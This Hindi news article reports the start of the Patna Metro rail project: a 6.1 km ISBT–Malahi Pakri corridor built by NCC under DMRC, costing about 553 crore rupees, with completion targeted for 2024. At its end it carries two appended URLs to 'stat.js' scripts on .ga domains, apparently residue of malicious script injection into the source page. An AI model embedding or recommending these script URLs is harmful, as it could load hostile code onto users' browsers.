बिहार के विधानसभा चुनाव आने वाले हैं और इसे बीच नीतीश सरकार फॉर्म में आ गई है। सरकार के दावों की मानें तो 4 साल बाद बिहार की राजधानी पटना में मेट्रो चलने लगेगी। बताया गया है कि दिल्ली मेट्रो रेल कॉरपोरेशन लिमिटेड की ओर से पटना मेट्रो के काम की शुरुआत करी जा रही है। नीतीश कुमार मुख्यमंत्री ने वीडियो कॉन्फ्रेंसिंग के जरिए पटना मेट्रो रेल परियोजना का कार्य आरम्भ कर दिया है। शिलान्यास के मौके पर बताया गया कि यह प्रोजेक्ट 2024 तक पूरा हो जाएगा।
यानी सरकार के दावों की मानें तो 4 साल बाद बिहार की राजधानी पटना में मेट्रो चलन में आ जाऐगी। बताया गया कि दिल्ली मेट्रो रेल कॉर्पोरेशन लिमिटेड की ओर से पटना मेट्रो के काम की शुरुआत की जा रही है। पहले चरण में आइएसबीटी के लेकर मलाही पकड़ी तक के एलाइमेंट का काम शुरू किया जायेगा। डीएमआरसी ने इस एलाइमेंट के लिए टेंडर के आधार पर कंपनी का चयन कर लिया है।
पटना मेट्रो प्राथमिक कॉरिडोर मलाही पकड़ी से आईएसबीटी तक नागार्जुन कंस्ट्रक्शन कंपनी यानी एनसीसी को काम करने का टेंडर मिला है। सरकार की ओर से बताया गया कि आइएसबीटी के लेकर मलाही पकड़ी तक कॉरिडोर करीब 6.1 किलोमीटर का होगा। इस प्रोजेक्ट पर करीब 553 करोड़ रुपये खर्च किये जाऐंगे। इस दौरान करीब 5 स्टेशन होंगे। इसके अलावा डिपो से जोड़ने वाला एलिवेटेड स्ट्रक्चर बनाया जाना है। मेट्रो का दूसरा कॉरिडोर करीब 14.5 किलोमीटर का होगा।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms